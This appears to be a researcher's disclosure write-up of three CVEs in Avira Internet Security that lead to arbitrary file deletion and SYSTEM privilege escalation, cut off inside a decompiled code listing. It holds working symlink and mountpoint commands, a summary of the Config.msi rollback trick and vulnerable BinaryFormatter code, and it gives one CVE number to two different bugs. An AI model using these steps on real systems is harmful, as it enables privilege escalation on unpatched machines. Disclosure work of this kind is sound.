Avira: Deserialize, Delete and Escalate - The Proper Way to Use an AV

Three vulnerabilities in Avira Internet Security, from an arbitrary file delete primitive to two distinct paths to SYSTEM privileges.

Three vulnerabilities in Avira Internet Security, from an arbitrary file delete primitive to two distinct paths to SYSTEM privileges. Introduction Avira Internet Security ships with a handful of modules that quietly handle privileged operations in the background: software updates, performance monitoring and system cleanup. Each one runs parts of its workflow as SYSTEM . Three of them don't bother checking what they are actually operating on. This writeup covers three issues: an arbitrary file delete ( CVE-2026-27748 ) in the Software Updater , an insecure deserialization ( CVE-2026-27749 ) in System Speedup , and an arbitrary folder delete over TOCTOU ( CVE-2026-27748 ) in the Optimizer . The file delete primitive is useful on its own. The other two both result in Local Privilege Escalation to SYSTEM . ℹ️ Impacted versions of Avira Vulnerable : 1.1.109.1990 and below. Fixed in: 1.1.114.3113. Technical background Avira's modules The modules involved are: Software Updater - Updates Avira components. Interacts with third-party binaries shipped in C:\ProgramData\OPSWAT\MDES SDK\ , some of which get deleted as part of the update cycle. System Speedup - Performance monitoring and optimization. Avira.SystemSpeedup.RealTimeOptimizer.exe starts running as SYSTEM when "Performance Booster" is enabled via the UI. Optimizer - Scans for junk, cached, and temporary files. The cleanup step runs as SYSTEM . About the config.msi trick Two of the three vulnerabilities below rely on the well-documented Config.msi deletion primitive . In short: abuse a SYSTEM-level delete to remove C:\Config.msi , recreate it with .rbs and .rbf rollback files, trigger an MSI install failure. Windows Installer processes your rollback scripts as SYSTEM and plants a DLL in C:\Program Files\Common Files\microsoft shared\ink\HID.DLL . Press CTRL+ALT+DEL , run osk.exe , SYSTEM shell. Read ZDI and Mandiant posts for the full details. ℹ️ Folder delete vs. File delete This trick abuses a folder delete redirection, which still works today. However, the file delete makes use of the deletion of the alternate data stream ::$INDEX_ALLOCATION , which is no longer possible since 24H2 because Microsoft patched it . Microsoft patch information about $INDEX_ALLOCATION. CVE-2026-27748: Arbitrary file delete The Software Updater deletes C:\ProgramData\OPSWAT\MDES SDK\wa_3rd_party_host_32.exe during its update process. There is no check on whether the path resolves to a symlink. Create one and get arbitrary file delete as SYSTEM . Before Windows 24H2 : it's LPE via the config.msi trick. After 24H2 , it's a denial of service or system integrity compromise depending on target. Tooling symboliclink-testing-tools - James Forshaw's toolkit Proof The target file exists and cannot be deleted by our limited user: Target file - not deletable as limited user. Prepare the directory and plant the symlink: # Create the directory PS C :\ temp > mkdir "C:\ProgramData\OPSWAT\MDES SDK" Répertoire : C :\ ProgramData \ OPSWAT Mode LastWriteTime Length Name ---- ------------- ------ ---- d ----- 06 / 08 / 2025 13 : 53 MDES SDK # Create the mountpoint to RPC Control PS C :\ temp > .\ CreateMountPoint . exe "C:\ProgramData\OPSWAT\MDES SDK" "\RPC Control" # Create the symlink to our target PS C :\ temp > .\ CreateSymlink . exe "\RPC Control\wa_3rd_party_host_32.exe" "C:\windows\system32\foobar.txt" Opened Link \ RPC Control \ wa_3rd_party_host_32 . exe -> \??\ C :\ windows \ system32 \ foobar . txt : 00000158 Press ENTER to exit and delete the symlink Run the Software Updater and wait for it to finish: Software Updater - start the update. Update in progress. Update complete. Procmon shows the symlink was followed and the target file is deleted: Procmon - target file deleted as SYSTEM . CVE-2026-27749: LPE via insecure deserialization Avira.SystemSpeedup.RealTimeOptimizer.exe runs as SYSTEM and deserializes C:\ProgramData\Avira\SystemSpeedup\temp_rto.dat using .NET's BinaryFormatter . No filter, no validation. The file is in ProgramData , which by default allows local users to create files. If temp_rto.dat already exists and can't be overwritten, CVE-2026-27748 gives us the delete we need to recreate it. This vulnerability has been quickly identified using CerealKiller , thanks to two06 from TrustedSec . Tooling dnSpy ysoserial.net CerealKiller Binary: C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.RealTimeOptimizer.exe Root cause Three deserialization calls exist in RealTimeOptimizer.exe : LoadDBFromFile , LoadCrashRestoreKnowledge , and LoadProcessExceptionKnowledge . We focus on LoadCrashRestoreKnowledge : private void LoadCrashRestoreKnowledge () { if ( File . Exists ( this . CrashRestoreKnowledgeBasePath )) { try { FileStream fileStream = new FileStream ( this . CrashRestoreKnowledgeBasePath , FileMode . OpenOrCreate ); BinaryFormatter binaryFormatter = new BinaryFormatter (); Dictionary crashRestoreKnowledge = this . _crashRestoreKnowledge ; lock (...